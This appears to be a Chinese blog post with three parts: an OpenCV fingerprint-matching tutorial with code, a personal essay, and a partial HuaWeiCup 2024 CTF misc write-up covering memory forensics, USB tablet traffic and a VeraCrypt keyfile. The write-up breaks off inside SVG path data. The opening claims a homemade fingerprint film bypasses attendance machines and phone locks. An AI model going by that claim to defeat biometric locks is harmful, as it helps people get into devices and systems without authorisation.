一丢丢的 FingerPrint Analysis

好久没有更新技术文章了,写写最近研究的小玩意。

image​​aa0f388fc1dd3ddb01864eb95513d4a

(下边就是我自己做的指纹膜,实操后是可以绕过一些签到机和手机指纹锁的)

我们的指纹为什么能用于解密手机?因为每个人的指纹都是独一无二、终生不变的,手机通过识别模块收集指纹信息,与之前存储在手机中的指纹信息进行对比,匹配成功即可解锁。

原理很简单,但是实现起来并不轻松。

指纹采集技术获取的指纹图像通常为二维灰度图像,其中脊线是暗的,而谷线是亮的。虽然指纹图像并不是深度图像,但是通过将灰度视为高度,可以将指纹显示为曲面(越黑越高),近似反映了实际手指皮肤上的高低起伏。成人脊线的宽度从0.1毫米到0.3毫米不等,脊线的周期约为0.5毫米。手指的轻微损伤,如表皮烧伤、擦伤或割伤,不会影响真皮层的脊线结构,新长出的皮肤还会恢复为原来的脊线结果,这就是指纹的终生不变性。

image

指纹增强

但是指纹图像常常会受到噪声、光照变化、模糊等影响,因此我们需要对目标指纹图片进行图片增强

image

CLAHE (Contrast Limited Adaptive Histogram Equalization), 一种增强图像对比度的方法,特别适用于局部图像区域的对比度调整,基于直方图均衡化,但对比度的增强是自适应的,并通过一个限制因子 (clipLimit) 来避免过度增强噪声。

自适应阈值化, 一种将图像转换为二值图像的方法,通过在每个局部区域内计算阈值来进行分割,而不是使用全局固定阈值,与传统的全局阈值化方法不同,自适应阈值化能够根据局部区域的不同亮度特征自动调整阈值,在图像中亮度不均匀或噪声较多的情况下,能够较好地分割出指纹区域。

def preprocess_fingerprint(image):
    # 检查图像格式并转换为灰度
    if len(image.shape) == 3:
        gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    else:
        gray = image

    # CLAHE 增强对比度
    clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
    enhanced = clahe.apply(gray)

    # 自适应阈值化
    binary = cv2.adaptiveThreshold(
        enhanced, 255,
        cv2.ADAPTIVE_THRESH_GAUSSIAN_C,
        cv2.THRESH_BINARY,
        blockSize=11,
        C=2
    )
    return binary

指纹关键点提取

SIFT(Scale-Invariant Feature Transform,尺度不变特征变换)是一种计算机视觉算法,用于从图像中提取局部特征点,并对它们进行描述和匹配,具体分为五步:

1. 尺度空间构造

为了找到图像的特征点,SIFT 构造了一组尺度空间来检测关键点。

  • 高斯模糊 (Gaussian Blur) :通过逐渐增加高斯核的标准差 $\sigma$,对图像进行多次模糊,得到多尺度图像。

  • 高斯差分 (DoG) :用相邻的模糊图像相减构造差分图像(Difference of Gaussian, DoG),公式为:

    $D(x, y, \sigma) = L(x, y, k\sigma) - L(x, y, \sigma)$

  • 其中 $L(x, y, \sigma)$ 是高斯模糊图像。

2. 关键点检测

DoG 图像中,关键点通过极值检测找到:

  • 每个像素点在其当前尺度的 $3 \times 3$ 邻域,以及上下相邻尺度的 $3 \times 3$ 邻域中,寻找局部极值点。

3. 关键点过滤

为了确保关键点的稳定性和准确性,SIFT 对检测到的关键点进行了进一步优化:

  • 去掉低对比度点:如果关键点的 DoG 值低于某个阈值,丢弃。
  • 去掉边缘响应点:通过计算 Hessian 矩阵,去除对边缘敏感的关键点。

4. 关键点方向分配

为实现旋转不变性,SIFT 为每个关键点分配一个主方向:

  • 以关键点为中心,计算邻域内像素的梯度幅值和方向。
  • 构建方向直方图(36个bin,覆盖 $0^\circ$ 到 $360^\circ$)。
  • 主方向是直方图中幅值最大的方向,必要时添加次方向。

5. 生成特征描述符

根据关键点的尺度和方向,计算关键点周围区域的描述。

但是当我们尝试利用 SIFT 算法进行关键点信息提取识别时,就会发现本算法会对关键点进行全局匹配,这可能导致对一些局部区域的错配,尤其是在旋转、位移或纹理局部损坏的情况下。

因此为减小误差,我们还要限制一下特征匹配的范围,即:

  • 提取指纹图像的核心区域(ROI,Region of Interest),只在ROI内进行匹配。
  • ROI可以通过二值化后提取连通区域,定位指纹的主要部分。

我们还可以添加几何约束,比如:

  • 角度一致性:匹配点之间的相对角度。
  • 距离一致性:匹配点之间的距离。
# === 提取 SIFT 关键点与描述符 ===
def extract_keypoints_sift(image):
    sift = cv2.SIFT_create()
    keypoints, descriptors = sift.detectAndCompute(image, None)
    return keypoints, descriptors

# === 匹配 SIFT 关键点 ===
def match_sift_keypoints(desc1, desc2, kp1, kp2):
    bf = cv2.BFMatcher(cv2.NORM_L2, crossCheck=True)
    matches = bf.match(desc1, desc2)

    filtered_matches = []
    for match in matches:
        pt1 = kp1[match.queryIdx].pt
        pt2 = kp2[match.trainIdx].pt
        distance = np.linalg.norm(np.array(pt1) - np.array(pt2))
        if distance < 100:  # 距离阈值
            filtered_matches.append(match)

    return sorted(filtered_matches, key=lambda x: x.distance)
# === ROI 提取函数 ===
def extract_roi(binary_image):
    contours, _ = cv2.findContours(binary_image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    if contours:
        largest_contour = max(contours, key=cv2.contourArea)
        x, y, w, h = cv2.boundingRect(largest_contour)
        roi = binary_image[y:y + h, x:x + w]
        return roi, (x, y, w, h)
    return binary_image, None

骨架化(脊线提取)

骨架化(脊线提取)是指在指纹图像中提取脊线(即指纹的主要纹理结构)的一种过程,在骨架化中腐蚀操作可以逐步去除图像边缘,膨胀则恢复图像的区域,结合腐蚀和膨胀,逐渐提取出指纹的细节;我们用到了 skimage 库中的 skeletonize​ 函数来进行骨架化。

# === 骨架化(脊线提取) ===
def extract_ridges(image):
    inverted = cv2.bitwise_not(image)
    skeleton = skeletonize(inverted // 255)
    skeleton = (skeleton * 255).astype(np.uint8)
    return skeleton

而在指纹形成脊线的同时,也产生了重要的关键点,也是指纹的独特标识符:

在脊线分裂成两条脊线的地方,我们称为分叉点,即指纹的脊线在某一点发生了分叉,形成两个方向。

当脊线到达某个点后终止的位置,我们称为端点,即脊线的尽头,没有继续延伸下去。

# === 提取分叉点和端点 ===
def extract_minutiae(skeleton):
    minutiae = []
    for y in range(1, skeleton.shape[0] - 1):
        for x in range(1, skeleton.shape[1] - 1):
            if skeleton[y, x] == 255:
                neighbors = skeleton[y - 1:y + 2, x - 1:x + 2].sum() // 255
                if neighbors == 2:  # 端点
                    minutiae.append((x, y, 'ending'))
                elif neighbors > 3:  # 分叉点
                    minutiae.append((x, y, 'bifurcation'))
    return minutiae
# 如果一个脊线像素周围只有一个相邻的脊线像素,那么该像素是一个端点。
# 如果一个脊线像素周围有三个或更多的相邻脊线像素,那么该像素是一个分叉点。

统计与计算

这个地方我们综合分析,两种算法的结果都要尊重,因此最后我们进行加权:

# === 计算匹配率 ===
def calculate_match_ratio(kp1, kp2, matches):
    return len(matches) / max(len(kp1), len(kp2))

# === 综合特征匹配函数 ===
def compare_fingerprints(img1, img2):
    binary1 = preprocess_fingerprint(img1)
    binary2 = preprocess_fingerprint(img2)

    roi1, _ = extract_roi(binary1)
    roi2, _ = extract_roi(binary2)

    # SIFT 匹配
    kp1, desc1 = extract_keypoints_sift(roi1)
    kp2, desc2 = extract_keypoints_sift(roi2)
    matches = match_sift_keypoints(desc1, desc2, kp1, kp2)
    sift_ratio = calculate_match_ratio(kp1, kp2, matches)

    # 脊线特征匹配
    ridge1 = extract_ridges(roi1)
    ridge2 = extract_ridges(roi2)
    minutiae1 = extract_minutiae(ridge1)
    minutiae2 = extract_minutiae(ridge2)
    minutiae_matches = len(set(minutiae1) & set(minutiae2))
    ridge_ratio = minutiae_matches / max(len(minutiae1), len(minutiae2))

    # 加权融合得分
    final_score = 0.7 * sift_ratio + 0.3 * ridge_ratio

    return final_score, matches, sift_ratio, ridge_ratio

处理结果

  1. 100.png:这个是原图,两个对比率均为100%

image

  1. 100_0.png:结果是对的,这两个确实来自同一个人,图片来源:Andrey_Kuzmin/Shutterstock

image

image

改进?

改进肯定是有的,例如在局部脊线方向和频率估计上,我们采用二维傅里叶变换检测局部区域的多个候选正弦波,然后利用相邻区域正弦波的连续性来确定正确的脊线方向和频率。

指纹识别中的傅里叶变换_matlab中如何计算指纹图像脊线的方向场与频率场-CSDN博客

还有背景纹理去除、指纹残缺等问题亟需解决,另外如何加入LLM,利用AI识别也是一个新的发展方向......指纹识别的道路也是任重道远,就算是上面写的这个我也是更迭了10个版本,不停地优化信息提取算法以及可视化分析,也只能算是小打小闹,上不得台面,希望大家还是多多批评指正🙏。

“喂,此去经年。”

此去经年,应是良辰好景虚设,便纵有千种风情,更与何人说。

标题早在几个月前就想好了,想为随笔系列画一个句号,但是大学毕业后自己一直没有稳定下来,加上天天出差,所以就拖到了现在。

此前我写过很多东西,也有师傅私信问过我:为什么要坚持写随笔呢?我想,可能这就是工科生的浪漫吧——希望在这个世界上以自己的方式,记录下属于自己的痕迹。从那张“诗与远方的门票”到新年共祝“敬来时人,敬同归路”,从“年轻,不留遗憾”的少年意气到“人生不是旷野是树林”的奇怪理论,很多时候大家看起来这些东西玄之又玄,莫名其妙😂那关于这点我会放在后面解释的。

18岁我来到了警校,与其每天都要去遵循那些一成不变的规定和严格的警务化管理模式,还要去上着我不太上心的课,我竟然开始萌生一种逃离的想法。大学四年的CTF比赛生涯,再加上自己的兼职攒钱作为旅游资金,我带着这台Dell G15 和 一部小iPhone,游历了十五个省,三十余个地市,一起看遍世间的三千繁华,一起在断井颓垣前喟然长叹,登上过最高的领奖台,也在遗憾离开赛场时不甘回眸……我曾经和师弟讲过好多次:“年轻人就应该多出去走走,你连世界都没观过,哪来的世界观呢?”如果把四年的赛事经历与时光写成一篇小说,我希望它永远不要有一个固定的结尾,只盼书中那个饱经风霜的少年终于在故事的结尾得到了梦寐以求的救赎,多浪漫啊!可惜,这样的发展也只能出现在小说之中,身本多忧,怎可全求?总归是要安定的,我也不能例外。从警校毕业之后我放弃了公安联考,通过自己四年积累的计算机特长来到了某市公安局,开启了人生的下一个篇章。

旅行中我还是蛮喜欢去拍照记录的,每当我到一个新的地点时,总是想用照片来承载这些美好的回忆。而发布在朋友圈里的总会有一张摆出✌手势的照片,大家看着肯定没有什么感觉,但是对我而言,这象征着一个阶段的结束,就如同大学毕业时空荡荡的宿舍楼,亦或是通宵学习后远处露出微茫的清晨,大家拍下的这些相片别人看来可能不明所以,但是对于我们自己而言却是感慨万千。

《黑神话·悟空》在我毕业的这段期间中占据了我很多时间,不仅仅是优美的游戏画面,还有它传递的精神深深地震撼着我。在央视对冯骥独家专访中,“踏上取经路,比抵达灵山更重要”今天我们踏上了新的旅程,这段路也许不再如童年时那般纯净美好,那般无忧无虑,但无论未来如何,无论能否在旅途的尽头找到心中的理想,我们的心中都已无憾,因为在这漫长的人生道路上,我们曾与心中最伟大的英雄并肩同行。在《未尽》篇章里有一段八戒与老猴子的对话,触动人心,我也不知反复听了多少遍:古往今来的奇才异能之士,何其之多,可真正成就不朽功业的却寥寥无几,你可知为何?世道不公?世道从来不公。运气不好?运气只是强者的谦辞。因为他们空有天赋,不思进取,小富即安,沉迷享乐,想安逸,又想名利,想快意江湖,又想成佛做祖,哪有这样的好事?身本多忧,怎可全求,有天命的眷顾,更需要有斩断私心烦念的觉悟。

OK,这篇随笔我感觉可以结束了,因为我要讲的东西也写完了。

我相信很多人都会疑惑,这是什么啊?先说了大学四年,又写了拍照记录,最后却用游戏对话收场,到底要表达什么呢?

我要说的东西很简单,用徐霞客的话来说,就是“初四日,兀坐听雪溜竟日”,用当年明月的话来说,就是“成功只有一个——按照自己的方式,去度过人生”。

每个人都无法改变既定的当下,面对无数的问题和困境,你的选择和行动反而能让人生的意义在困境中盛开,正如最美的烟花注定绽放在最深的黑夜里

2024年11月3日下午,高铁站台,我撕开了那张诗与远方的门票,看着它随风飘扬,最后落在站台上,与列车在夕阳下渐行渐远,我不经意地回头看向那个位置,仿佛站着一个背着电脑、脸上挂着黑眼圈的青年在向我招手,一瞬间竟有点恍惚了,“喂,此去经年。”“嗯啊,此去经年。”

2024 HuaWeiCup misc partly WriteUp

Draw_what_you_like

flag1

在桌面上有flag.txt,直接vol提取

image

image

flag2

搜索flag2,发现有flag2.zip

image

提取出来,里面有一个sqlite文件

image

发现有密码Digital5211314

桌面上有一个draw.zip​文件,提取出来,密码同上

有流量包,是数位板流量,用脚本进行处理:

import os
import matplotlib.pyplot as plt
os.system("tshark -r draw.pcap -T fields -e usbhid.data| sed '/^\s*$/d' > 1.txt")
data=[]
with open('1.txt',"r") as f:
    for line in f.readlines():
        if line[16:18] !="00":
            data.append(line)
X = []
Y = []
for line in data:
        x0=int(line[4:6],16)
        x1=int(line[6:8],16)
        x=x0+x1*256
        y0=int(line[8:10],16)
        y1=int(line[10:12],16)
        y=y0+y1*256
        X.append(x)
        Y.append(-y)
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title("result")
ax1.scatter(X, Y, c='b', marker='o')
plt.show()

image

flag3

附件给了secret.zip​,观察大小刚好是50mb,怀疑是VC容器

在查看文件时发现有一个打什么CTF.jpg​文件

image

提取出来,winhex打开删除多余的空字符,作为密钥文件加载secret.zip

image

flag03:Verakey_graph}

Secret of the Varied Gif

binwalk分离出一个decode,是SVG路径数据,写脚本处理:

import matplotlib.pyplot as plt
from svg.path import parse_path, Line, CubicBezier, QuadraticBezier, Arc
# 定义SVG路径数据,每个子路径作为一个列表元素
svg_paths = [['m320.66772,62.66697c0,0 0,0.59068 0,1.77203c0,2.36269 0,5.90674 0,8.26943c0,3.54405 0,8.26944 0,10.63214c0,2.95337 0,5.90674 0,10.04146c0,3.54405 0,5.31607 0,7.67877c0,1.18135 0,3.54404 0,5.31606c0,1.77203 0,3.54405 0,4.7254c0,1.18135 0,2.95337 0,4.13471c0,1.18135 0,2.3627 0,3.54405c0,0.59067 0,2.36269 0,3.54404c0,0.59067 0,2.36269 0,2.95337c0,1.77203 0,2.95338 0,4.13472c0,1.77202 0,3.54404 0,4.72539c0,1.18135 0,2.95338 0,4.13472c0,1.77202 0,2.95337 0,4.13471c0,1.18135 0,2.3627 0,3.54405c0,1.18135 0,2.36269 0,3.54404c0,1.18135 0,2.36269 0,3.54404c0,1.18136 0,1.18136 0,2.3627c0,1.18135 0,1.77202 0,2.36269c0,1.18135 0,1.77202 0,2.36269c0,1.18135 0,1.77202 0,2.95337c0,0.59068 0,1.18136 0,1.77203c0,0.59067 0,1.18135 0,1.77202c0,0.59067 0,0.59067 0,2.36269c0,0.59067 0,1.18135 0,1.77202c0,0 0,0.59067 0,1.18135c0,0 -0.34444,0.48657 -0.70833,1.77203c-0.16275,0.57487 -0.54214,0.6806 0,1.77202c0.38335,0.77175 0.70833,1.18135 0.70833,1.18135c-1.41667,0 -1.41667,0 -2.125,0c-0.70833,0 -0.70833,0 -1.41667,0c-0.70833,0 -0.70833,0 -1.41667,0c-0.70833,0 -2.83333,0 -3.54167,0c-1.41669,0 -2.12502,0 -2.83336,0c-1.41667,0 -2.125,0 -3.54167,0c-0.70833,0 -0.70833,0 -2.125,0c0,0 -0.70833,0 -1.41667,0c-0.70833,0 -1.41667,0 -1.41667,0c-0.70833,0 -1.41667,0 -2.125,0c-0.70833,0 -1.41667,0 -2.125,0c0,0 -0.70833,0 -1.41667,0c0,0 -0.70833,0 -2.125,0c-0.70833,0 -2.125,0 -2.125,0c-0.70833,0 -2.125,0 -2.83336,0c0,0 -1.41667,0 -2.125,0c-0.70833,0 -0.70833,0 -1.41667,0c-0.70833,0 -0.70833,0 -2.125,0c0,0 -1.41667,0 -2.125,0c-0.70833,0 -2.125,0 -2.83333,0c-1.41667,0 -2.125,0 -2.125,0c-1.41667,0 -2.125,0 -2.83333,0c-0.70833,0 -1.41667,0 -1.41667,0c-0.70833,0 -2.125,0 -2.83333,0c-1.41667,0 -1.41667,0 -2.12502,0c-1.41667,0 -2.125,0 -3.54167,0c0,0 -0.70833,0 -2.125,0c-0.70833,0 -2.125,0 -2.125,0c-0.70833,0 -2.125,0 -2.83333,0c0,0 -2.125,0 -3.54167,0c-0.70833,0 -2.125,0 -3.54167,0c-1.41667,0 -1.41667,0 -2.125,0c-0.70833,0 -1.41668,0 -2.12501,0c-1.41667,0 -2.125,0 -2.83333,0c-0.70833,0 -1.41667,0 -1.41667,0c-0.70833,0 -1.41668,0 -2.12501,0c-0.70833,0 -1.41667,0 -2.125,0l0,0'], ['m518.66791,60.66697c0,0 0,0.59067 0,1.77203c0,2.36269 0,5.90674 0,8.26943c0,3.54405 0,8.26944 0,10.63214c0,2.95337 0,5.90674 0,10.04146c0,3.54405 0,5.31607 0,7.67877c0,1.18135 0,3.54404 0,5.31606c0,1.77203 0,3.54405 0,4.72539c0,1.18135 0,2.95337 0,4.13472c0,1.18135 0,2.36271 0,3.54405c0,0.59067 0,2.36269 0,3.54404c0,0.59067 0,2.36269 0,2.95337c0,1.77203 0,2.95337 0,4.13472c0,1.77202 0,3.54404 0,4.72539c0,1.18135 0,2.95338 0,4.13473c0,1.77202 0,2.95337 0,4.13472c0,1.18135 0,2.3627 0,3.54405c0,1.18135 0,2.36269 0,3.54404c0,1.18135 0,2.36269 0,3.54404c0,1.18136 0,1.18136 0,2.36271c0,1.18135 0,1.77202 0,2.36269c0,1.18135 0,1.77202 0,2.36269c0,1.18135 0,1.77202 0,2.95337c0,0.59068 0,1.18135 0,1.77203c0,0.59067 0,1.18135 0,1.77202c0,0.59067 0,0.59067 0,2.36269c0,0.59067 0,1.18135 0,1.77202c0,0 0,0.59067 0,1.18135c0,0 -0.29581,0.48658 -0.60833,1.77203c-0.13978,0.57487 -0.46561,0.6806 0,1.77202c0.32922,0.77175 0.60833,1.18135 0.60833,1.18135c-1.21667,0 -1.21667,0 -1.825,0c-0.60833,0 -0.60833,0 -1.21667,0c-0.60833,0 -0.60833,0 -1.21667,0c-0.60833,0 -2.43333,0 -3.04167,0c-1.21669,0 -1.82502,0 -2.43336,0c-1.21667,0 -1.825,0 -3.04167,0c-0.60833,0 -0.60833,0 -1.825,0c0,0 -0.60833,0 -1.21667,0c-0.60833,0 -1.21667,0 -1.21667,0c-0.60833,0 -1.21667,0 -1.825,0c-0.60833,0 -1.21667,0 -1.825,0c0,0 -0.60833,0 -1.21667,0c0,0 -0.60833,0 -1.825,0c-0.60833,0 -1.825,0 -1.825,0c-0.60833,0 -1.825,0 -2.43335,0c0,0 -1.21667,0 -1.825,0c-0.60833,0 -0.60833,0 -1.21667,0c-0.60833,0 -0.60833,0 -1.825,0c0,0 -1.21667,0 -1.825,0c-0.60833,0 -1.825,0 -2.43333,0c-1.21667,0 -1.825,0 -1.825,0c-1.21667,0 -1.825,0 -2.43333,0c-0.60833,0 -1.21667,0 -1.21667,0c-0.60833,0 -1.825,0 -2.43333,0c-1.21667,0 -1.21667,0 -1.82502,0c-1.21667,0 -1.825,0 -3.04167,0c0,0 -0.60833,0 -1.825,0c-0.60833,0 -1.825,0 -1.825,0c-0.60833,0 -1.825,0 -2.43333,0c0,0 -1.825,0 -3.04167,0c-0.60833,0 -1.825,0 -3.04167,0c-1.21667,0 -1.21667,0 -1.825,0c-0.60833,0 -1.21667,0 -1.82501,0c-1.21667,0 -1.825,0 -2.43333,0c-0.60833,0 -1.21667,0 -1.21667,0c-0.60833,0 -1.21668,0 -1.82501,0c-0.60833,0 -1.21667,0 -1.825,0l0,0'], ['m350.66769,62.66697c0,0 0,0.58549 0,1.75648c0,2.34197 0,5.85492 0,8.19689c0,3.51296 0,8.1969 0,10.53888c0,2.92746 0,5.85493 0,9.95337c0,3.51296 0,5.26944 0,7.61141c0,1.17098 0,3.51295 0,5.26943c0,1.75648 0,3.51296 0,4.68394c0,1.17098 0,2.92746 0,4.09845c0,1.17098 0,2.34198 0,3.51297c0,0.58549 0,2.34197 0,3.51295c0,0.58549 0,2.34197 0,2.92746c0,1.75648 0,2.92747 0,4.09845c0,1.75648 0,3.51295 0,4.68394c0,1.17098 0,2.92747 0,4.09846c0,1.75648 0,2.92746 0,4.09845c0,1.17098 0,2.34197 0,3.51296c0,1.17098 0,2.34197 0,3.51295c0,1.17098 0,2.34197 0,3.51295c0,1.171 0,1.171 0,2.34198c0,1.17098 0,1.75648 0,2.34197c0,1.17098 0,1.75648 0,2.34197c0,1.17098 0,1.75648 0,2.92746c0,0.5855 0,1.17099 0,1.75648c0,0.58549 0,1.17098 0,1.75648c0,0.58549 0,0.58549 0,2.34197c0,0.58549 0,1.17098 0,1.75648c0,0 0,0.58549 0,1.17098c0,0 0.31202,0.48231 0.64167,1.75649c0.14744,0.56983 0.49113,0.67463 0,1.75648c-0.34726,0.76498 -0.64167,1.17098 -0.64167,1.17098c1.28333,0 1.28333,0 1.925,0c0.64167,0 0.64167,0 1.28333,0c0.64167,0 0.64167,0 1.28333,0c0.64167,0 2.56667,0 3.20834,0c1.28336,0 1.92503,0 2.56669,0c1.28333,0 1.925,0 3.20834,0c0.64167,0 0.64167,0 1.925,0c0,0 0.64167,0 1.28333,0c0.64167,0 1.28333,0 1.28333,0c0.64167,0 1.28333,0 1.925,0c0.64167,0 1.28333,0 1.925,0c0,0 0.64167,0 1.28333,0c0,0 0.64167,0 1.925,0c0.64167,0 1.925,0 1.925,0c0.64167,0 1.925,0 2.56669,0c0,0 1.28333,0 1.925,0c0.64167,0 0.64167,0 1.28333,0c0.64167,0 0.64167,0 1.925,0c0,0 1.28333,0 1.925,0c0.64167,0 1.925,0 2.56667,0c1.28333,0 1.925,0 1.925,0c1.28333,0 1.925,0 2.56667,0c0.64167,0 1.28333,0 1.28333,0c0.64167,0 1.925,0 2.56667,0c1.28333,0 1.28333,0 1.92502,0c1.28333,0 1.925,0 3.20834,0c0,0 0.64167,0 1.925,0c0.64167,0 1.925,0 1.925,0c0.64167,0 1.925,0 2.56667,0c0,0 1.925,0 3.20834,0c0.64167,0 1.925,0 3.20834,0c1.28333,0 1.28333,0 1.925,0c0.64167,0 1.28334,0 1.92501,0c1.28333,0 1.925,0 2.56667,0c0.64167,0 1.28333,0 1.28333,0c0.64167,0 1.28335,0 1.92501,0c0.64167,0 1.28333,0 1.925,0l0,0'], ['m560.0764,60.66697c0,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 2.56338,0c1.28169,0 1.28169,0 1.92254,0c0.64085,0 1.28169,0 1.92254,0c0,0 1.28169,0 1.28169,0c1.28169,0 1.28169,0 2.56338,0c0,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 0.64085,0 1.92254,0c0,0 0.64085,0 1.92254,0c0.64088,0 1.92257,0 1.92257,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 0.64085,0 1.92254,0c0.64085,0 1.92254,0 2.56338,0c0,0 1.28169,0 3.20423,0c0.64085,0 1.92254,0 1.92254,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 1.92254,0 2.56338,0c0.64085,0 1.28169,0 1.92254,0c0,0 1.28169,0 1.28169,0c1.28169,0 1.92254,0 2.56338,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 1.92254,0 2.56338,0c0.64085,0 1.92254,0 1.92254,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 1.28169,0 1.92254,0c0,0 0.64085,0 1.28169,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 0.64085,0 1.92257,0c0.64085,0 1.28169,0 2.56338,0c0,0 1.28169,0 1.92254,0c0.64085,0 1.28169,0 1.92254,0c0,0 0.64085,0 1.28169,0c0,0 0.64085,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c1.28169,0 1.28169,0 1.92254,0c0.64085,0 0.64085,0 1.28169,0c0.64085,0 0.64085,0 1.92254,0c0,0 0.64085,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 0.64085,0.61979 0.64085,1.23958c0,0.61979 0,1.23959 0,1.23959c0,0.61979 0,1.23958 0,1.85938c0,0.61979 -0.29402,0.42979 -0.64085,1.23959c-0.24525,0.57262 0,0.61979 0,1.23959c0,0.61979 0.14723,1.25616 0,1.85938c-0.32922,1.34882 -0.64085,1.23958 -0.64085,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0 -0.52831,0.06067 -1.28169,1.23958c-0.67382,1.05445 0,1.85938 0,2.47917c0,0 0,1.23958 0,1.23958c0,1.23958 0,1.85938 0,2.47917c0,0 0,1.23959 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0 0,1.23958 0,1.23958c0,0.6198 0,1.23959 0,1.23959c0,0.61979 0,1.23958 0,2.47917c0,0 0,0.61979 0,1.23959c0,0.61979 0,1.23958 0,1.23958c0,1.23958 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,1.23958 0,1.23958 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,0.61979 0,1.23958c0,0.6198 0,0.6198 0,1.23959c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 -0.64085,2.47917c0,0 0,0.61979 0,1.23958c0,0 0,0.61979 0,1.23959c0,0 0.24525,0.66697 0,1.23958c-0.34682,0.8098 -0.64085,1.23958 -0.64085,1.85938c0,0.61979 0,0.61979 0,1.23958c0,1.23958 0,1.85938 0,2.47917c0,0.61979 -0.64085,0.61979 -0.64085,1.23958c0,0.61979 0,1.23959 0,1.85938c0,0.61979 -0.18771,0.80132 -0.64085,1.23958c-0.90627,0.87652 0.67382,1.42471 0,2.47917c-0.75338,1.17891 -1.28169,1.23958 -1.28169,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0.6198 0,1.23959 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0 0,1.23958 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,0.61979 0,1.85938c0,0 0,0.61979 0,1.23958c0,0 0,0.6198 0,1.23959c0,0 0,1.23958 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,0.61979 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.85938 0,2.47918c0,0.61979 0,1.23958 0,1.85938c0,0 0,1.23958 0,1.85938c0,0.61979 -0.24525,1.28677 0,1.85938c0.34682,0.8098 0.64085,1.23958 0.64085,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.6198 0,0.6198 0,1.23959c0,0.61979 0,0.61979 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0 0,0.61979 0,1.23959c0,0 0,0.61979 0,1.23958c0,0.61979 -0.29402,1.04958 -0.64085,1.85938c-0.24525,0.57261 0,0.61979 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0 -0.64085,0 -1.28169,0.61979c0,0 -1.28169,0 -1.92254,0c-1.92254,0 -3.20423,0 -3.84507,0c-1.28169,0 -1.92254,0 -3.20423,0c0,0 -0.64085,0 -1.28169,0c-0.64085,0 -1.28169,0 -1.92254,0c-0.64085,0 -1.28169,0 -1.92254,0c-0.64088,0 -1.28173,0 -1.28173,0c-1.28169,0 -1.28169,0 -1.92254,0c-0.64085,0 -1.92254,0 -1.92254,0c-0.64085,0 -1.28169,0 -3.20423,0c-0.64085,0 -1.92254,0 -2.56338,0c-0.64085,0 -1.92254,0 -2.56338,0c-0.64085,0 -1.92254,0 -3.20423,0.61979c-1.28169,0.61979 -2.56338,0.61979 -3.20423,0.61979c-0.64085,0 -1.28169,0 -1.92254,0c-0.64085,0 -1.28169,0 -1.28169,0c-1.28169,0 -1.92254,0 -2.56338,0c-1.28169,0 -1.28169,0 -1.92254,0c-1.28169,0 -1.92254,0 -3.20423,0c0,0 -1.28169,0 -1.92254,0c-0.64085,0 -1.92254,0 -3.20423,0c-0.64085,0 -1.28169,0 -2.56338,0c-0.64085,0 -1.28169,0 -1.92257,0c-0.64085,0 -1.28169,0 -1.92254,0c-0.64085,0 -1.28169,0 -1.28169,0c-0.64085,0 -1.28169,0 -3.20423,0c-0.64085,0 -0.64085,0 -1.92254,0c-0.64085,0 -1.28169,0 -1.28169,0c-1.28169,0 -2.56338,0 -3.20423,0c-0.64085,0 -1.28169,0 -1.92254,0c0,0 -0.64085,0 -1.28169,0c0,0 -0.64085,0 -1.28169,0c-1.28169,0 -1.92254,0 -2.56338,0c-1.28169,0 -2.56338,0 -2.56338,0c-0.64085,0 -1.28169,0 -1.92254,0c-0.64085,0 -0.64085,0.61979 -1.28169,0.61979c-0.64085,0 -0.64085,0 -1.92254,0l-0.64085,0l-0.64085,0'], ['m674.43176,77.337c0.57234,-0.49745 1.14469,-0.49745 1.71703,-0.49745c1.71703,0 2.28937,0 3.4341,0c1.14469,0 2.28937,0 2.86172,0c1.14469,0 1.71703,0 2.28937,0c1.14469,0 1.71703,0 2.28937,0c0.57234,0 0.57234,0 1.71703,0c0.57234,0 1.14469,0 1.71703,0c0.57234,0 1.14469,0 1.71703,0c1.14469,0 1.71703,0 2.28937,0c0,0 0.57234,0 1.14469,0c0.57234,0 1.14469,0 1.71703,0c0.57234,0 0.57234,0 2.28937,0c0.57234,0 1.14469,0 1.71703,0c0,0 1.14469,0 1.71703,0c0.57234,0 1.71703,0 2.86172,0c0.57234,0 1.14469,0 2.28937,0c0,0 0.57234,0 2.28937,0c0,0 2.28937,0 3.43406,0c1.14472,0 2.86175,0 4.00644,0c0.57234,0 2.33294,0.19037 2.86172,0c0.74781,-0.26922 1.71703,-0.49745 2.28937,-0.49745c0.57234,0 1.14469,0 1.14469,0c0,-0.49746 1.14469,-0.49746 1.71703,-0.49746c0.57234,0 